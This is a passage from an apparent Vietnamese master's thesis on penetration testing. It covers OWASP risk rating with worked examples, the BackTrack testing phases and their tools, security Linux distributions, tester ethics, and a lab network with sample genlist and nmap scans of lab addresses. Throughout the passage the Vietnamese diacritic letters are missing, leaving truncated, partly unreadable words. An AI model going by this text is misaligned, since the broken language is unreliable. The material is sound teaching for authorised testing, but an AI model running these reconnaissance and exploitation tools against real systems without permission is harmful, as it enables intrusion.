Listener Parameter File D:\oracle\ora90\network\admin\listener.ora
The command completed successfully
LSNRCTL>
Tham kho
Trang trng
Oracle Database Listener Security Guide -
http://www.integrigy.com/security-resources/whitepapers/
Integrigy_Oracle_Listener_TNS_Security.pdf
62
Cng c
TNS Listener tool (Perl) -
http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html
Toad for Oracle - http://www.quest.com/toad
2.3.6. Hng dn lm bo co nh gi ri ro thc s
Trong phn ny, OWASP xy dng phng php xp hng ri ro da trn kh
nng v tc ng ca tng mi e da v cch trnh by bo co. tng ca
OWASP l xy dng mt khung c bn v ngi s dng nn ty chnh li cho
ph hp vi t chc ca h.
Cch tip cn ca OWASP trnh by da trn nhng phng php tiu chun
v c ty bin cho an ninh ng dng. u tin l m hnh ri ro tiu chun:
Ri ro = Kh nng * Tc ng
Phng php OWASP xut phn tch cc yu t to nn kh nng v
tc ng n an ninh ng dng v cho thy lm th no kt hp chng xc
nh mc nghim trng ri ro tng th. Bao gm cc bc sau:
Bc 1: Xc nh mt ri ro
Xc nh ri ro an ninh no cn phi c xp hng. Cc tc nhn e da,
chn tc nhn xu nht v s dn n ri ro tng th cao nht.
Bc 2: Cc nhn t nh gi Kh nng
Bao gm hai nhn t l tc nhn e da v l hng. Nhn t tc nhn e
da bao gm: cp k nng; ng c; c hi; kch thc. Nhn t l hng bao
gm: d pht hin; d khai thc; kh nng nhn thc; pht hin xm nhp. 8 nhn
t ny s c chm im t 0-9 c trnh by chi tit ti trang 327 [27].
Bc 3: Cc nhn t nh gi Tc ng
Cng bao gm hai Tc ng l tc ng k thut v tc ng kinh doanh
(u tin s dng kt qu tc ng kinh doanh xp hng ri ro). Tc ng k
63
thut bao gm: mt b mt; mt ton vn; mt sn sng; mt trch nhim. Tc ng
kinh doanh bao gm: thit hi ti chnh; thit hi danh ting; khng tun th; vi
phm ring t. 8 tiu ch ny cng c chm im t 0 - 9 theo tiu ch c trnh
by chi tit ti trang 328 [27].
Bc 4: Xc nh mc nghim trng ca ri ro
Sau khi c s liu t bc 2 v 3. Tnh im trung bnh cc ri ro. T im
trung bnh ta c c mc ri ro da trn bng sau:
Mc ca kh nng v tc ng
0 n <3 Cao
3 n <6 Trung bnh
6 n 9 Thp
Bng 5: Xc nh mc ri ro
Sau y l v d v cch tnh Kh nng v Tc ng tng th:
Nhn t tc nhn e da Nhn t l hng
cp
k nng
ng
c
c
hi
kch
thc
d pht
hin
d khai
thc
kh nng
nhn thc
pht hin
xm nhp
5 2 7 1 3 6 9 2
Kh nng tng th = 4.375 (TRUNG BNH)
Bng 6: Bng tnh kh nng tng th
Tc ng k thut Tc ng kinh doanh
Mt
b
mt
Mt
ton
vn
Mt sn
sng
Mt
trch
nhim
Thit
hi ti
chnh
Thit hi
danh
ting
Khng
tun
th
Vi phm
ring t
9 7 5 8 1 2 1 5
Tc ng k thut tng th = 7.25
(CAO)
Tc ng kinh doanh tng th = 2.25
(THP)
Bng 7: Bng tnh tc ng tng th
T hai bng trn, p xung bng tnh mc nghim trng ri to tng th ta
s xc nh c vi tc ng k thut th mc nghim trng l Nghim trng,
Cao, Trung bnh, Thp hay Ch .
64
Mc nghim trng ca ri ro tng th
Tc ng
CAO Trung bnh Cao Nghim trng
TRUNG BNH Thp Trung bnh Cao
THP Ch Thp Trung bnh
CAO TRUNG BNH THP
Kh nng
Bng 8: Bng tnh mc nghim trng ri ro tng th
Nh ni trn, mc nghim trng ca ri ro tng th tnh theo Tc
ng kinh doanh u tin hn. Cng theo v d trn: Kh nng l Trung bnh, v tc
ng k thut l Cao, do t quan im hon ton k thut th mc tng th l
Cao. Tuy nhin, Tc ng kinh doanh thc s l Thp, v vy mc tng th
c m t tt nht l Thp. y l l do ti sao s hiu bit bi cnh kinh doanh
ca l hng c nh gi l rt quan trng a ra quyt nh ri ro tt. Hin
nay trong nhiu t chc, s khng hiu bi cnh ny c th dn n s thiu tin
tng v xung t gia nhm kinh doanh v nhm an ninh.
Bc 5: Quyt nh sa cha ci g
T kt qu xp hng ri ro tng th bc 4, nhng ri ro nghim trng nht
s c u tin sa trc.
Bc 6: Ty chnh m hnh xp hng ri ro ca bn
Ty chnh ph hp vi tng doanh nghip l rt quan trng. Ta c th
thm yu t khc nhau nhng quan trng vi t chc ca mnh, chng hn nh ca
s c hi cho k tn cng hoc phc tp thut ton m ha. Hoc iu chnh cc
ty chn hoc xc nh trng s cc yu t.
Cui cng l hng dn lm bo co. Nn c cc phn nh: Tm tt iu
hnh; Tng quan qun l k thut; nh gi pht hin (bao gm mt bng cc bi
65
kim th c thc hin cng vi kt qu, gii php, ); v Cng c (lit k
cc cng c s dng kim th).
2.3.7. Kt lun v phng php OWASP
Cc tnh nng v li ch chnh
KTAN cc ng dng web OWASP m bo trnh c cc cuc tn
cng v im yu ph bin nht v duy tr tnh b mt, ton vn v sn
sng ca mt ng dng web.
Cng ng OWASP cng pht trin mt s cng c an ninh tp
trung vo cc kim th ng dng web: t ng v th cng. Mt s
cng c ny l WebScarab, Wapiti, JBroFuzz, v SQLiX, c sn km
theo h iu hnh BackTrack.
Khi xem xt nh gi an ninh ca h tng web, Hng dn kim th
OWASP cung cp chi tit cng ngh nh gi c th, v d, tip cn
kim th Oracle khc hn so vi MySQL. Hng dn cung cp mt ci
nhn rng hn v cng tc nhiu cng ngh gip ngi kim th la
chn cc th tc ph hp nht kim th.
Khuyn khch thc hin lp trnh an ton i vi ngi lp trnh bng
cch tch hp KTAN tng giai on pht trin. iu ny s m bo
cc sn phm ng dng mnh m, khng c li, v an ton.
c chp nhn v tha nhn rng ri trong ngnh cng nghip phn
mm. Mi ri ro an ninh hng u (top 10) cng c th lin kt vi
cc tiu chun nh gi ng dng an ninh web khc, do gip sn
phm ca t chc t c nhiu hn mt tiu chun ti mt thi im
vi nhng n lc t hn.
66
2.4. Phng php BackTrack
y c th xem l phng php n gin nht trong cc phng php KTAN
trnh by phn trn. Mc tiu ca phng php tp trung m t cc k thut
KTXN v cch thc s dng cng c c sn trong BackTrack. Cc giai on tin
nh gi v hu nh gi khng c cp n. Theo phng php BackTrack,
KTXN c thc hin ti a thng qua mi bc sau y.
2.4.1. Xc nh phm vi mc tiu
Trc khi bt u k thut nh gi an ninh, iu quan trng l quan st v
hiu phm vi mi trng ca mng mc tiu. Bit c phm vi nh ngha c th
l mt hay nhiu thc th. Ci g c kim th, lm th no kim th, nhng
iu kin g c p dng trong qu trnh kim th, nhng g hn ch thc hin
kim th, thi gian hon thnh kim th, v s t c mc tiu kinh doanh g.
Giai on ny, ngi kim th cng phi nhn thc c cng ngh s dng, chc
nng c bn v kh nng tng tc vi mi trng mng ca n. V vy, kin thc
ca ngi kim th l ng gp ng k i vi bt k loi nh gi an ninh no.
2.4.2. Thu thp thng tin
Trong giai on ny, ngi KTXN s dng cc ngun ti nguyn cng khai
tm hiu thm v mc tiu ca mnh. Thng tin ny c th c ly t ngun
th ba nh Internet: cc din n, bng tin, nhm tin, bi vit, blog, mng x hi,
v.v. Ngoi ra, d liu cng c th c thu thp thng qua cng c tm kim khc
nhau nh Google, Yahoo, Bing, k thut ny thng gi l thu thp th ng.
K thut ch ng thng dng nhng cng c thc hin khai ph d liu thu
thp thng tin thng qua DNS, router, ICMP ping, CSDL Whois, e-mail, s in
thoi, thng tin c nhn, v ti khon ngi dng. Cc cng c c trng cho tng
k thut thu thp thng tin v lnh v d nh sau:
67
Metagoofil (tm cc file ti liu pdf, doc, ppt trn website mc tiu. Chy
lnh sau trn giao din dng lnh # ./metagoofil.py). Dnswalk (tm tn v a ch IP
lu trong my ch DNS mc tiu. Chy lnh sau # ./dnswalk). Dmitry (cng c a
nng tm nhiu loi thng tin. # dmitry). Maltego (cng c ha cho php thu thp
v biu din thng tin thun tin).
2.4.3. Khm ph mc tiu
Giai on ny ch yu l xc nh tnh trng mng, HH mc tiu, v kin
trc mng tng i ca n. iu ny cung cp mt hnh nh hon chnh cng
ngh hin ti hoc cc thit b kt ni bn trong v c th gip tip tc lit k cc
dch v khc nhau chy trn mng. S dng cc cng c mng t BackTrack
xc nh my ch mng ang chy, HH trn cc my ch, v c trng cho tng
thit b theo vai tr ca n trn h thng mng. Nhng cng c ny thng thc
hin cc k thut pht hin ch ng v th ng. Theo hai nhm k thut chnh l
tm my ch ang hot ng v ly mu HH (OS fingerprinting) xc nh loi
v phin bn HH ci trn cc my ch . Cc cng c hay dng nh:
Tm my hot ng: ping, aping (dng yu cu ARP), fping (ping nhiu a
ch IP mt lc), genlist (ping c mng, kt qu l cc my tr li yu cu ICMP).
Mu HH: p0f (thm d th ng bng cch phn tch gi tin TCP), xprobe2
(thm d ch ng vi k thut du hiu m - fuzzy)
2.4.4. Lit k cc mc tiu
Giai on ny s dng thng tin v cc my ch giai on trc v tm cc
cng m trn h thng mc tiu. Khi xc nh c cc cng m, c th lit k cc
dch v ang chy. S dng mt s k thut qut cng nh: m (full-open), na
m (half-open), v tng hnh (stealth), cng c qut c th gip xc nh cng m
ngay c khi my ch pha sau tng la hoc mt h thng IDS. Cc dch v nh
x ti cc cng m gip vic tip tc iu tra cc l hng c th tn ti trn h tng
68
mng mc tiu. Do , giai on ny coi nh l c s cho vic tm kim l hng an
ninh trong cc thit b mng khc nhau c th dn ti xm nhp su hn. Ngi
kim th c th s dng mt s cng c t ng c trong BackTrack t c
cc mc tiu ca giai on ny. Cc cng c c trng sau:
AutoScan v Netifera (cng c ha, d dng), nmap (cng c mnh xc
nh my ch trn mng cng nh phn on HH, c v l dao gm Thy s
ca an ninh mng), zenmap (giao din ha ca nmap), amap (kim tra ng dng
no ang chy trn cng m), httprint (xc nh phn mm, phin bn chy my
ch web), ike-scan (tm v xc minh dch v VPN).
2.4.5. Bn l hng
Cc giai on trc thu thp y thng tin v mng mc tiu. By gi l
lc nh v v phn tch cc l hng da trn cc cng v dch v bit. Qu
trnh ny c th t c thng qua mt s cc cng c mng t ng v nh gi
l hng ng dng c trong HH BackTrack. Cng c th c thc hin th cng,
nhng phi mt nhiu thi gian v i hi kin thc chuyn mn. Tuy nhin, kt
hp c hai phng php tip cn cho php ngi kim th nhn r rng, cn thn
bt k l hng bit hoc cha bit c th tn ti u trn h thng. Cc cng
c chnh dng trong giai on ny l:
OpenVAS (cng c mnh, tp hp ca nhiu cng c n l khc nhau, hot
ng theo kiu client/server), Cisco Auditing Tool (qut tm nhng im yu trn
router Cisco nh mt khu mc nh, chui SNMP, ), bed (cng c mnh dng
k thut phn tch m), JBroFuzz (mt nn tng ph bin dng trong kim th m
ng dng web), ADMSnmp (cng c qut SNMP), DBPwAudit (pht trin trn nn
Java kim tra mt khu ca my ch Oracle, MSSQL, MySQL v DB2), SQLiX
(cng c qut l hng chn SQL vit bng Perl). SQLMap (cng c t ng qut,
pht hin v khai thc li chn SQL trn URL), Burp Suite (cng c mnh, c kh
nng qut, phn tch, v khai thc l hng ng dng web bng th cng hoc t
69
ng), LBD (mt script nh pht hin website c dng k thut cn bng ti hay
khng), Nikto (qut an ninh my ch web), ratproxy (cng c bn t ng nh
gi an ninh ng dng web, dng k thut thm d th ng), WebScarab (cng c
nh gi an ninh ng dng web mnh, dng k thut proxy).
2.4.6. Cng ngh x hi
Thng ch dng khi cc bc khc khng khai thc c thng tin hay c
yu cu t ch s hu ti sn. Ngh thut nh la c th quan trng ng k khi
khng c cng m trn mng mc tiu. Nh vy, bng cch s dng hng tn
cng vo con ngi, vn c th xm nhp vo h thng mc tiu bng cch la
ngi s dng thc thi m c hi m cng hu. Cng ngh x hi c di cc
hnh thc khc nhau. C th l bt c ai gi l ngi qun tr mng qua in thoi
la bn tit l thng tin ti khon, hoc mt e-mail la o yu cu cc chi tit ti
khon ngn hng ca nn nhn. C rt nhiu kh nng c th p dng t c
cc mc tiu. iu cn lu rng thm nhp thnh cng, i khi cn yu cu
thm thi gian xc nh tm l con ngi trc khi p dng bt k s nh la
thch hp i vi mc tiu. Cng c chnh l Social Engineering Toolkit (SET):
nhiu chc nng, d dng gip chun b nhng iu kin k thut nh la
thnh cng nh to Java applet, to website gi mo, e-mail phishing,
2.4.7. Khai thc mc tiu
Sau khi pht hin cc l hng, th c th xm nhp h thng mc tiu da trn
cc loi Khai thc c sn. i khi c th yu cu nghin cu hoc sa i cc khai
thc hin c lm cho n hot ng ng. iu ny nghe c v hi kh khn,
nhng c th d dng hn khi thc hin cng vic vi cc cng c c cung cp
km theo BackTrack. Hn na, ngi kim th cng c th p dng cc phng
php khai thc pha khch hng pha trn vi mt cht cng ngh x hi ly
quyn kim sot h thng mc tiu. Nh vy, giai on ny ch yu tp trung vo
70
qu trnh thu thp mc tiu. V qu trnh phi hp ba lnh vc ct li, trong lin
quan n hot ng tin khai thc, khai thc, hu khai thc. Cng c thng dng
nht l Metasploit Framework [14]. Gm 3 phn th vin, giao din v m-un.
Giao din bao gm: MSFconsole, MSFcli, Armitage (GUI); m-un bao gm:
exploit, payload, encoder, auxiliary v nop. Mi phn c mt chc nng c th.
Ngoi ra, Metasploit Express v Metasploit Pro l phin bn thng mi dng giao
din web.
Mt s khi nim cn bit khi s dng Metasploit l:
Exploit (khai thc): l phng tin m k tn cng, hoc ngi KTXN
li dng mt l hng trong h thng/ng dng/dch v. C th hiu
exploit dng lm cho h thng mt phng hng hoc khng thc
hin c cc chc nng nh ngi pht trin mong mun
Payload (ti trng): l on m m ngi tn cng mun h thng thc
thi sau khi exploit. Hai k thut hay dng l reverse shell yu cu my
nn nhn to kt ni n my tn cng v bind shell m giao din dng
lnh trn cng m my nn nhn.
Shellcode: tp hp ch th dng nh payload. Thng dng ngn ng
assembly.
Encode (m ha): dng m ha d liu payload, trnh b pht hin
bi phn mm dit Virus, IDS.
Auxiliary (ph tr): dng thu thp thm thng tin.
Listener (nghe mng): dng ch kt ni t my nn nhn v.
2.4.8. Leo thang c quyn
Mt khi mc tiu c thu thp, s xm nhp thnh cng. Ngi kim th c
th di chuyn t do vo h thng ty thuc vo quyn truy cp ca mnh. Nhng
quyn ny cng c th c leo thang (nng cao) bng cch s dng bt k khai
71
thc cc b ph hp vi mi trng h thng, thng th nn nng n quyn qun
tr. Ngoi ra cn c mt kh nng tha hip tm hiu thm v mc tiu bng
cch thm d lu lng mng (sniff), b kha mt khu. C th ni, mc ch ca
leo thang c quyn l t c mc truy cp cao nht trong h thng.
Cng c hay dng l: rainbowcrack (dng k thut rainbow table b mt
khu), samdump2 ( ly d liu bm ca mt khu Windows 2000/NT/XP/Vista t
file SAM), John (cng c dng b mt khu t d liu bm), wireshark (cng
c phn tch giao thc mng), ettercap (cng c gi ARP tn cng chn gia
man-in-the-middle).
2.4.9. Duy tr truy cp
i khi ngi kim th c yu cu gi li kh nng truy cp vo h thng
trong mt khong thi gian quy nh. Hot ng ny c th c s dng chng
minh truy cp bt hp php vo h thng m khng thc hin qu trnh KTXN mt
ln na. iu ny gip tit kim thi gian, chi ph, v cc ngun lc phc v t
c truy cp vo h thng. Bng cch s dng mt s phng php ng hm
qua cc giao thc hoc proxy c th dn n mt cng hu c thit lp. Loi k
thut ny cung cp mt ci nhn r rng v vic lm th no mt k tn cng c th
duy tr s hin din ca mnh trong h thng m khng c hnh vi n o khc.
Cng c thng dng l: DNS2tcp (ng gi TCP trong gi tin DNS), Ptunnel
(gi TCP trong gi tin ICMP (ping)), Proxychains (p mt kt ni phi i qua mt
chui proxy).
2.4.10. Ti liu v Bo co
Ti liu v bo co trnh by cc l hng c tm thy, xc minh, v khai
thc. T quan im o c iu ny cc k quan trng bi v cc nhm qun l
v k thut c th kim tra cc phng php thm nhp v c gng ng bt k l
72
hng an ninh pht hin. Ngoi ra, cc bo co ny c th phc v mc ch so
snh s ton vn h thng mc tiu trc v sau qu trnh xm nhp.
2.4.11. Kt lun v phng php BackTrack
BackTrack cha hn 300 cng c phc v cho KTXN. Cc cng c ny c th
phn thnh cc nhm ph hp vi cc k thut nu trn. Tuy cha phi l phng
php y nhng s tp trung ca phng php vo KTXN cho php ta c mt
la chn tuyt vi phi hp vi cc phng php khc trong ton b quy trnh
KTAN.
2.5. Mt s cng c kim th xm nhp
Phng php no cng phi c cng c i km hin thc ha phng php
. C th ni c rt nhiu cng c ring l h tr KTAN ni chung v KTXN ni
ring. Phn loi cc cng c ring l ny rt kh khn v mt cng c c th c
nhiu chc nng ng vi tng giai on kim th. Cng c nhng cng c, nht l
cng c thng mi tch hp nhiu chc nng cho php thc hin KTAN t giai
on thm d cho n kt lun, thm nhp, v d nh CORE Impact, Metasploit
Pro, Nhng a phn l cng c m ngun m c tp hp trong cc h iu
hnh Linux c th lit k v m t ngn gn nh sau:
BackTrack [i1] l mt bn phn phi Linux Live trn a DVD c pht
trin c bit KTXN. Dng nh dng DVD Live, ta c th s dng BackTrack
trc tip t a DVD m khng cn ci t n vo my tnh. BackTrack cng c
th c ci t vo a cng v s dng nh mt HH hot ng thng xuyn.
BackTrack l mt s hp nht gia ba bn phn phi Linux KTXN khc nhau
IWHAX, WHOPPIX v Auditor. Trong phin bn hin ti ca n (5.0), BackTrack
c da trn bn phn phi Ubuntu Linux 8.10. D kin gia thng 08/2012
BackTrack pht hnh phin bn 5.0 Release 3. Bn thn n c tch hp hng
trm cng c m ngun m gip cho hot ng KTXN c d dng nhanh chng.
73
KNOPPIX-STD [i20] l bn CD/ DVD Live da trn bn phn phi Debian.
N l tp hp ca hng trm cng c an ninh m ngun m. N c th dng lm
tng la, IDS, honeypot. S dng n phc hi d liu, nh gi l hng,
KTXN, phn tch chng c php l my tnh.
FIRE [i22] l b cng c an ninh da trn Linux c th khi ng trn CD vi
mc tiu thc hin phn tch chng c, ng ph s c, khi phc d liu, qut
virus, phn tch l hng. im mnh ca n l cung cp mi trng phn tch
chng c an ninh trn nhiu HH: Windows 32, SPARC Solaris v x86 Linux.
Helix [i23] l b cng c an ninh da trn Linux, mnh v phn tch chng c
an ninh trn ba nn tng chnh l: Mac OS, Windows v Linux.
Samurai Web Testing Framework [i24] l b live Linux c cu hnh sn cho
mc ch KTXN mi trng web. B CD ca n cha kh nhiu cng c m
ngun m kim th v tn cng website.
PHLAK [i25] l mt b phn phi Linux. N da trn Morphix. PHLAK c
hai phin bn: FatMan large CD-iso, LittleBoy slimmed USB pendrive.
VAST [i21] l b cng c KTXN chuyn cho mng VoIP v mng truyn
thng hp nht da trn nn tng Linux. N cho php cc chuyn gia an ninh mng
v qun tr mng truyn thng hp nht thc hin nh gi an ninh v qut l hng
thit b IP phone v IP PBX nhanh chng. VAST xy dng trn Mint Linux 13.
2.6. Cc vn v o c ngi kim th xm nhp
Ngi KTAN ni chung v KTXN ni ring khi tip xc vi ti sn ca
khch hng thng l ti sn nhy cm, v y c th l nhng thng tin ng gi.
Nu Ngi kim th khng vt qua c cm d, ly thng tin bn cho bn
th ba hoc tng tin chnh ch s hu hoc cng b cng khai cc l hng nhm
mc ch ni ting th s thit hi rt ln cho ch s hu ng thi mt nim tin
ca nhng t chc khch hng tim nng. Tuy nhin, vn ny vn cha nht
74
qun, c phng php cp k, v d nh OSSTMM, c phng php khng nu
ln. Theo quan im ca tc gi, y l vn quan trng v cn phi xy dng
nhng quy tc chun mc gii kim th ngy cng chuyn nghip, o c hn.
Nhng quy nh ny xc nh cch cc dch v kim th s c cung cp
nh th no, kim th phi c thc hin nh th no, xc nh cc hp ng v
cc cuc m phn hp php, xc nh phm vi kim th, chun b k hoch kim
th, theo di qu trnh kim th, v qun l mt cu trc bo co ph hp. C th
tm tt nh sau:
Quy tc khi thc hin tip th v bn hng cc dch v KTAN
S dng s lo lng, khng hiu bit, h nghi ca khch hng v di tr
trong trnh by/trn website/cc ti liu h tr/cc bo co, cho mc
ch bn hoc cung cp KTAN c th khng hiu qu. Khch hng cn
c t vn trung thc lin quan n cc bin php an ninh ca h.
Cm cung cp cc dch v min ph c li xm nhp vo cc mc
tiu. Cm t chc cc cuc thi cng khai v b kha v xm nhp
thc y bn hng v tip th KTAN hoc cc sn phm an ninh.
Nu tn khch hng qu kh hoc hin ti trong bn hng hoc tip th
vi nhng khch hng tim nng ch c php nu khch hng c cho
php s dng tn bng vn bn lm vic .
m phn v Hp ng
C hoc khng tha thun khng cng b, tuy nhin, Ngi KTAN cn
gi b mt thng tin khch hng v kt qu kim th.
Hp ng phi gii thch r cc gii hn v nguy him ca KTAN
thnh mt phn ca tha thun ca cng vic.
Khch hng phi cung cp tuyn b k cung cp quyn min tr cho
nhng ngi KTXN trong phm vi, v trch nhim bi thng chi ph
75
thit hi ca dch v kim th vi cc trng hp ngoi l l hot ng
nguy hi c chng minh.
Hp ng phi bao gm quyn kim th cc k thut r rng v c th
nh t chi dch v, KTXN, v cng ngh x hi. Hp ng phi c
quy trnh cho nhng hp ng v sau v nhng thay i tha thun.
Phm vi kim th
Phm vi phi c xc nh r rng bng hp ng trc khi thm tra
cc dch v d b tn thng.
Nghim cm thc hin KTAN i vi bt k phm vi no m khng c
s cho php bng vn bn r rng t ch s hu mc tiu hoc c quan
c thm quyn ph hp.
KTAN ti h thng, a im, v qui trnh khng an ton v khng n
nh mt cch r rng th b cm cho n khi c s h tng an ninh
thch hp c thit lp.
K hoch v quy trnh kim th
K hoch kim th c th khng bao gm cc k hoch, quy trnh, k
thut, hoc th tc nm ngoi lnh vc chuyn mn hoc thm quyn
ca ngi kim th.
Ngi kim th phi tn trng v duy tr s an ton, sc khe, phc li,
v s ring t ca mi ngi c trong v ngoi phm vi.
K hoch kim th ch r cc mc thi gian cn thit. c bit khuyn
khch xy dng mt lch trnh m khng lm gin on gi lm vic.
Ngi kim th phi lun tun th lut php ti ni t mc tiu ngoi
cc quy tc v lut php ni ngi kim th thc hin kim th.
Nhng ngi kim th cn phi nm vng cc cng c ca h, cc
cng c c t u, cc cng c lm vic nh th no, v h kim th
76
trong mt khu vc kim th gii hn trc khi s dng cc cng c ti
t chc ca khch hng cha.
Cc kim th c bao gm con ngi ch c th c thc hin trn
nhng ngi trong phm vi v khng bao gm cc c nhn, khch
hng, i tc, lin kt hoc nhng thc th bn ngoi khc m khng c
s cho php bng vn bn t nhng thc th .
Xc minh nhng hn ch nghim trng hoc c th gy nguy him sng
cn cho t chc ngay khi c pht hin khi kim th phi c bo
cho khch hng vi gii php khc phc thc t ngay lp tc.
Bo co
Kt qu kim th v bo co phi c trnh by theo mt th t r
rng v nht qun. Cc bo co phi nh du tt c cc l hng bit
v cha bit.
Ngi kim th phi tn trng s ring t ca tt c cc c nhn v duy
tr s ring t trong tt c cc kt qu. Bo co phi khch quan v
khng thin lch hoc nhm n bt k c nhn no mt cch c .
Tt c cc knh truyn thng cung cp cc bo co phi c b mt t
u n cui. Kt qu v bo co khng bao gi c s dng cho li
ch thng mi vt qu s cung cp cho khch hng.
2.7. Tm tt chng 2
Tuy c khc nhau, nhng tu trung, cc phng php u coi KTXN l k
thut kim th quan trng, gip cng c cc kt qu t c trong cc k thut
KTAN khc, cng nh pht hin cc l hng phc tp, kh pht hin giai on
pht trin, l hng phi hp ca nhiu nhn t gy nn. Trong khi phng php
OSSTMM ch trng cao phn tch an ninh th phng php ISSAF v
OWASP coi trng phn tch ri ro. V d sau y s cho ta thy s khc nhau gia
77
phn tch ri ro v nh gi an ninh: gi s mt bc tng di v cao i din cho
an ninh. Phn tch ri ro s xem xt nhng g c th vt qua c bc tng,
nhng cc phn tch an ninh s tp trung vo cc vt nt, nn tng vng chc
khng, v bc tng dy hoc cao ngn chn hoc kim hm xm nhp vi
thi gian di lc lng bo v n ni v p tr cuc tn cng. V vy, phn
tch ri ro c gng pht hin l hng v nh x n cc mi e da lin quan, cn
phn tch an ninh tp trung vo cc kim sot c tt v y cha. Xt v phm
vi bao ph tng th th OSSTMM v ISSAF cp n KTAN ni chung cn
OWASP tp trung vo KTXN ng dng web. Phng php BackTrack ch yu tp
hp v phn loi cc cng c KTXN theo tng giai on kim th m phng
php ny xut. Phng php ny s gii thiu chi tit trong chng 3.
Ngoi ra cn nhiu phng php khc nhau na nh cp phn u.
Trong khun kh lun vn, tc gi nghin cu, gii thiu ba phng php trn c
trng cho phng php KTXN c s dng bi cc t chc trong cc ngnh cng
nghip trn th gii. Hin cng c nhiu hng nghin cu phi hp v so snh
cc phng php trn trong KTXN nh tham kho ti [28] [29].
78
Chng 3. NG DNG KIM TH XM NHP
H THNG MNG
3.1. Gii thiu
Hai chng u ca lun vn trnh by c s l thuyt KTAN v KTXN.
By gi l lc thc hnh lm r cc l thuyt . Trong cc k thut KTAN th
KTXN lun l phn phc tp nht, mt phn l do cc cng c an ninh ngy cng
tinh vi, mnh m nn kh nng thnh cng ca KTXN kh khn hn, mt phn do
cng c KTXN s dng kh phc tp, thng phi phi hp nhiu cng ngh, k
thut cho mt KTXN. Cc phng php trn cng gii thiu mt vi cng c an
ninh, tuy nhiu vic s dng cng c no phn nhiu do thi quen, tnh d s dng,
ci t, nhiu ti liu tham kho v tc cp nht. Vi cc tiu ch nh vy th
hin nay BackTrack ang l mt cng c sng gi. Ngoi ra, do phng php
BackTrack tp trung ch yu vo k thut KTXN nn tc gi chn phng php v
cng c BackTrack lm thc hnh ng dng KTXN cho lun vn.
3.2. Quy trnh kim th xm nhp bng BackTrack.
Phng php BackTrack tp trung m t cc k thut KTXN, tuy nhin theo
phng php BackTrack, cc k thut ny s dng khng theo quy trnh c th m
ngi KTXN c th s dng ty . V vy, tc gi xut mt quy trnh KTXN
n gin da trn cc nhm cng c BackTrack. Quy trnh KTXN c m t nh
hnh di, ty thuc vo k thut hp en hay hp trng, ta c th b qua mt s
bc nh thu thp thng tin v khm ph mc tiu. Nu ch s hu mc tiu c
yu cu hoc cc k thut thu thp thng tin khc khng cho kt qu th ta c th
thc hin bc Cng ngh x hi. Vi nhng h thng ln, vic KTXN i hi
thi gian di, yu cu duy tr kt ni n mc tiu khai thc hoc cn bng
chng thng bo cho ch s hu th ta c th thc hin bc Duy tr truy cp.
79
Hnh 14: Minh ha quy trnh KTXN BackTrack
Phng php BackTrack khng cp n Hu khai thc, y l bc da
vo nhng mc tiu khai thc tip tc khai thc nhng mc tiu su hn bn
trong tm thm thng tin v mng mc tiu, m coi n l mt phn ca k thut
Khai thc mc tiu. Tc gi xut n l mt bc c lp v k thut khai thc
ca n kh khc so vi Khai thc mc tiu.
3.3. Xy dng h thng mng gi lp
V mt k thut, c th dng mt mng gi lp bng to mt mng vi cc
my tnh thc hoc k thut my o hoc honeypot. Trong iu kin lm lun vn,
th dng mt mng vi cc my thc tn chi ph v kh kh thi. My o l k thut
dng phn mm gi lp my tnh o vi y HH, ng dng, hin nay, ti
Vit Nam dng nhiu nht l gii php VMware ca VMware INC v Hype-V ca
Microsoft. Honeypot l k thut dng mt loi phn mm c bit gi mt
mng hoc dch v nh lc hng tin tc vi h thng thc hoc nh tin tc
xm nhp vo v ghi li mi hot ng ca h nghin cu [30]. Vi mc tiu
to mng gi lp th dng honeypot c u im l mi hot ng ca ngi kim
th u c ghi li. Nhc im l phc tp cao, kh cu hnh v qun l,
ng thi mc tiu thy c cc l hng trong kim th khng c. Cn dng k
thut my o th n gin, trc quan hn. Nhc im ca gii php ny l tn
Phm vi
mc tiu
Thu thp
thng tin
Khm ph
mc tiu
Lit k mc
tiu
Bn l
hng
Cng ngh
x hi
Khai thc
mc tiu
Leo thang
c quyn
Duy tr
truy cp
Ti liu v
bo co
Hu khai
thc
80
nhiu ti nguyn vt l ti my thc. Sau khi so snh u nhc im ca tng gii
php, tc gi la chn dng o ha vi gii php Hype-V ca Microsoft. Hnh 15 l
m hnh mng gi lp.
HH dng cho mng gi lp ch yu l c v khng c cp nht cc bn v
li trong nhiu nm. Mc ch l c nhiu l hng c tm thy. My ch web
dng Windows 2000 Server vi IIS lm ng dng qun l web, my ch CSDL l
Linux Ubuntu vi MySQL lm CSDL. Cc my trm ci Windows XP.
Hnh 15: S mng gi lp
3.4. Dng k thut BackTrack kim th xm nhp
Do tc gi t xy dng mng gi lp nn dng k thut hp en kh cho kt
qu khch quan. V vy, KTXN thc hin y s dng cch tip cn hp trng,
theo , pha tn cng nm r cu hnh mng b tn cng. T ta c th bt u
KTXN bng bc u tin nh sau:
Bc 1: Phm vi mc tiu l mng vi a ch ngoi 172.16.17.111. a ch
trong lp C 192.168.50.0/24; s dng dch v web, CSDL MySQL.
Bc Thu thp thng tin khng cn thc hin. Tuy nhin, nu phi thc hin
bc ny th ngoi vic tm kim thng tin trn Google, mng x hi th Backtrack
c cng c tm kim da trn Google rt hu hiu l metagoofil nhm tm kim cc
file ti liu trn website mc tiu. V dnswalk hay dmitri tm thng tin v DNS
My ch CSDL
d
d
d
d
d
s
d
s
d
Internet
NAT server
My ch web
My trm
81
lu trong my ch DNS ca mc tiu. Nu ta ang trong mng LAN cng vi
mc tiu th dng lnh p0f nhm thu thp thng tin th ng, iu ny gip hn ch
b pht hin nhng mt kh nhiu thi gian.
Bc 2 Khm ph mc tiu v Lit k mc tiu: bc u thng dng
cng c rt ph bin l ping xem mc tiu c cho php ICMP. Dng arping
dng yu cu ARP thay v ICMP pht hin mc tiu. Ngoi ra, cn mt cng c
tm c mng con l genlist cho php ping ln lt cc a ch IP trong mng con
tm my ang bt.
root@bt #genlist -s 172.16.17.0/24
172.16.17.1
172.16.17.10
172.16.17.111
Mt cng c c th dng trong c hai bc trn l nmap, cng c ny xem xt
cc kh nng c th pht sinh hng tn cng t a ch 172.16.17.111: HH,
phin bn, cc cng no ang m, dch v chy trn cng. Nmap cn dng thm c
-A l ch th on HH, dch v v phin bn chy trn mc tiu.
root@bt# nmap sS Pn A 172.16.17.111
..rut gn
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 80/tcp open http Microsoft IIS httpd 6.0
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
